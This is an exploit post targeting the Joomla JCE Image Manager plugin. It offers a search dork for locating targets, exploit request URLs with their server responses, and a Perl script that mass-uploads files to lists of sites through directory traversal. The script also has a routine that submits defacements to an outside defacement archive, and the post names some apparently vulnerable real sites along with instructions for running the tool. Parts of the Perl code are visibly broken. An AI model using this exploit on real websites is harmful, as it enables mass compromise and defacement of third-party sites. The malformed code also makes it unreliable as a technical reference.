################################################################################# Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army Vendor Homepage : joomlacontenteditor.net Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/ Date : 23/05/2018 Exploit Risk : High ################################################################################# Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter Google Dork [ Example ] => inurl:''/index.php?option=com_jce'' You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain. Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... Office-like functions and familiar buttons make formatting simple Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser Easily tab between WYSIWYG, Code and Preview modes. Create Tables, edit Styles, format text and more... Integrated Spellchecking using your browser's Spellchecker Fine-grained control over the editor layout and features with Editor Profiles Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio. Easily insert Youtube and Vimeo videos - just paste in the URL and Insert! Insert HTML5 Video and Audio with multiple source options Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor Insert multiple images. Create responsive images with the srcset attribute Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension Filemanager => Create links to images, documents, media and other common file types Include a file type icon, file size and modified date Insert as a link or embed the document with an iframe Create downloadable files using the download attribute. Template Manager => Insert pre-defined template content form html or text files Create template snippet files from whole articles or selected content Configure the Template Manager to set the startup content of new articles ################################################################################# Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. The component is prone to a the following security vulnerabilities: 1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script. 2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Affected JCE 2.1.0 is vulnerable; other versions may also be affected. References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481 References => https://www.securityfocus.com/bid/53630 Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT This JCE is well-known by some hackers but some hackers do not know about nothing about this vulnerability. So this is the new one. TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png ################################################################################# Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg An Attacker cannot reach this image manager without username and password on the control panel. But there is a little trick to upload a image or a file behind this vulnerability. One Attacker must execute with remote file upload code. Watch Videos from Original Sources => Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video] Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video] How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video] ################################################################################# You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors. Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 {"result":{"error":true,"result":""},"error":null} Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload or giving this error => {"result":null,"error":"No function call specified!"} Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":null,"error":"No function call specified!"} Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt Auto Mass Exploiter Perl => [code]#!/usr/bin/perl use Term::ANSIColor; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); $ua->timeout (10); system('title JCE Mass Auto Exploiter by KingSkrupellos'); print "JCE Mass Auto Exploiter\n"; print "Coded by KingSkrupellos\n"; print "Cyberizm Digital Security Team\n"; print "Sitelerin Listesi Reyis:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; foreach $site(@TARGETS){ chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"; print "wait upload $site\n"; $vulnurl=$site.$exploiturl; $res = $ua->get($vulnurl)->content; if ($res =~ m/No function call specified!/i){ open(save, '>>C:\Users\Kullanıcılar\Mustafa\result\list.txt'); print "\n[Uploading]"; my $res = $ua->post($vulnurl, Content_Type => 'form-data', Content => [ 'upload-dir' => './../../', 'upload-overwrite' => 0, 'Filedata' => ["kingskrupellos.png"], 'action' => 'upload' ] )->decoded_content; if ($res =~ m/"error":false/i){ }else{ print " ......... "; print color('bold white'); print "["; print color('reset'); print color('bold green'); print "PATCHED"; print color('reset'); print color('bold white'); print "] \n"; print color('reset'); } $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> ); $def= "$site/kingskrupellos.png"; print colored ("[+]Basarili",'white on_red'),"\n"; print "$site/kingskrupellos.png\n"; }else{ print colored (">>Exploit Olmadi<<",'white on_blue'),"\n"; } } sub zonpost{ $req = HTTP::Request->new(GET=>$link); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); $ar = $response->content; if ($ar =~ /Hacked By KingSkrupellos/){ $dmn= $link; $def="KingSkrupellos"; $zn="http://aljyyosh.org/single.php"; $lwp=LWP::UserAgent->new; $res=$lwp -> post($zn,[ 'defacer' => $def, 'domain1' => $dmn, 'hackmode' => '15', 'reason' => '1', 'Gönder' => 'Send', ]); if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { print colored ("[-]Gönder $1",'white on_green'),"\n"; } else { print colored ("[-]Hata",'black on_white'),"\n"; } }else{ print" Zone Alınmadı !! \n"; } }[/code] How to use this code on your operating system like Windows ; Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it. Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt C:/Users/Your-Computer-Name/ cd Desktop cd "jcee" perl yourexploitcodenamejce.pl site.txt Waiting for Upload Exploit Successful or Not Finished ################################################################################# Example Sites => aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":{"error":true,"result":""},"error":null} sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload THE END ################################################################################# Discovered By KingSkrupellos from Cyberizm Digital Security Team